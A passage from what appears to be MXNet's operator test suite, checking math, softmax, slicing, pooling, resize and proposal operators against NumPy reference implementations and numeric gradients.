data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
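# Reference implementation of smooth-L1 with scaling sigma:
#   f(x) = 0.5 * (sigma * x)^2   if |x| < 1 / sigma^2
#   f(x) = |x| - 0.5 / sigma^2   otherwise
# with derivative sigma^2 * x inside the quadratic region and sign(x) outside.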
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtypes)
# - Backward: Comparison to NumPy (several dtypes)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for binary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtypes)
# - Backward: Comparison to NumPy (several dtypes)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
def test_softmax():
check_softmax_with_shape((3, 4), default_context(), preserve_shape=False)
check_softmax_with_shape((3, 4), default_context(), preserve_shape=True)
check_softmax_with_shape((3, 4, 2), default_context(), preserve_shape=True)
check_softmax_grad(default_context())
check_smoothed_softmax_grad(default_context())
@with_seed()
def test_softmax_output_normalization():
def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
grad_scale = np.random.random()
batch_size = 8
num_labels = 6
H, W = 3, 3
ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
if multi_output:
data_shape = (batch_size, num_labels, H, W)
label_shape = (batch_size, H, W)
else:
data_shape = (batch_size, num_labels)
label_shape = (batch_size, )
data = mx.nd.random.uniform(-1, 1, shape=data_shape)
label = mx.nd.random.randint(
0, num_labels, shape=label_shape).astype('float32')
data.attach_grad()
kwargs = dict(grad_scale=grad_scale,
normalization=normalization, multi_output=multi_output)
if use_ignore:
kwargs.update(use_ignore=True, ignore_label=ignore_label)
with mx.autograd.record():
out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
out.backward(mx.nd.ones_like(data))
exp_data = mx.nd.exp(data)
softmax_data = exp_data / exp_data.sum(1, keepdims=True)
argmax_data = mx.nd.argmax(data, axis=1)
assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
one_hot_label = mx.nd.one_hot(label, num_labels)
if multi_output:
one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
data_grad = softmax_data - one_hot_label
if use_ignore:
if multi_output:
data_grad *= (label !=
ignore_label).reshape((batch_size, 1, H, W))
else:
data_grad *= (label != ignore_label).reshape((batch_size, 1))
valid_cnt = 1
if normalization == 'batch':
valid_cnt = batch_size
elif normalization == 'valid':
valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
scale = grad_scale / valid_cnt
if multi_output:
if normalization != 'valid':
scale /= H * W
data_grad *= scale
assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
for multi_output in [False, True]:
for use_ignore in [False, True]:
for normalization in ['null', 'batch', 'valid']:
_softmaxoutput_normalization(
multi_output, use_ignore, normalization)
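
# Illustrative sketch (not part of the original test suite): the expected
# gradient computed above relies on the standard identity that, for
# cross-entropy loss on softmax outputs, d(loss)/d(logits) equals
# softmax(logits) - one_hot(label). A minimal NumPy version for 2-D logits
# (helper name is an assumption made for this example only):
def _example_softmax_ce_grad(logits, labels):
    """Return softmax(logits) - one_hot(labels) for logits of shape (N, K)."""
    shifted = logits - logits.max(axis=1, keepdims=True)  # numerical stability
    exp = np.exp(shifted)
    probs = exp / exp.sum(axis=1, keepdims=True)
    one_hot = np.zeros_like(probs)
    one_hot[np.arange(logits.shape[0]), labels] = 1.0
    return probs - one_hot
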
@with_seed()
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
def test_begin_equals_end(shape, begin, end, step):
in_arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
out_arr = mx.nd.slice(in_arr, begin=begin, end=end, step=step)
assertRaises(MXNetError, test_begin_equals_end, (4,), (2,), (2,), (1,))
assertRaises(MXNetError, test_begin_equals_end, (1, 5), (None, 3), (None, 3), (-1, 1))
assertRaises(MXNetError, test_begin_equals_end, (3, 4, 5), (1, 3, 1), (3, 3, 1), (1, -3, 2))
assertRaises(MXNetError, test_begin_equals_end, (2, 4), (None, 2), (None, 2), (1, -1))
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
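
# Illustrative sketch (not part of the original test suite): the special case
# noted in check_squeeze_op exists because np.squeeze collapses an all-ones
# shape to a 0-d array, whereas the operator under test keeps one axis
# (presumably because these NDArrays cannot be zero-dimensional):
def _example_squeeze_all_ones():
    x = np.ones((1, 1, 1))
    assert np.squeeze(x).shape == ()                  # NumPy: 0-d result
    assert np.squeeze(x, axis=(1, 2)).shape == (1,)   # shape compared against above
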
@with_seed()
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
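
# Illustrative sketch (not part of the original test suite): the floor/ceil
# index arithmetic in py_adaptive_avg_pool splits an input axis into possibly
# overlapping bins. For an input size of 10 pooled down to 3, the bins are
# [0, 4), [3, 7) and [6, 10) (helper name is an assumption for this example):
def _example_adaptive_pool_bins(isize=10, osize=3):
    bins = []
    for o in range(osize):
        start = int(np.floor(1.0 * o * isize / osize))
        end = int(np.ceil(1.0 * (o + 1) * isize / osize))
        bins.append((start, end))
    return bins  # [(0, 4), (3, 7), (6, 10)] for the default arguments
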
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
                w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
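
# Illustrative sketch (not part of the original test suite): py_bilinear_resize
# above uses an "align corners" scale of (input_size - 1) / (output_size - 1)
# and splits each fractional source coordinate into an integer index plus a
# blending weight. A 1-D version of the same interpolation (helper name is an
# assumption for this example only):
def _example_linear_resize_1d(row, out_size):
    in_size = len(row)
    scale = 1.0 * (in_size - 1) / (out_size - 1) if out_size > 1 else 0.0
    out = np.empty(out_size)
    for i in range(out_size):
        src = i * scale
        lo = int(np.floor(src))
        frac = src - lo
        hi = lo + 1 if lo < in_size - 1 else lo
        out[i] = (1 - frac) * row[lo] + frac * row[hi]
    return out
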
def test_multi_proposal_op():
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output.asnumpy(),expected,
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
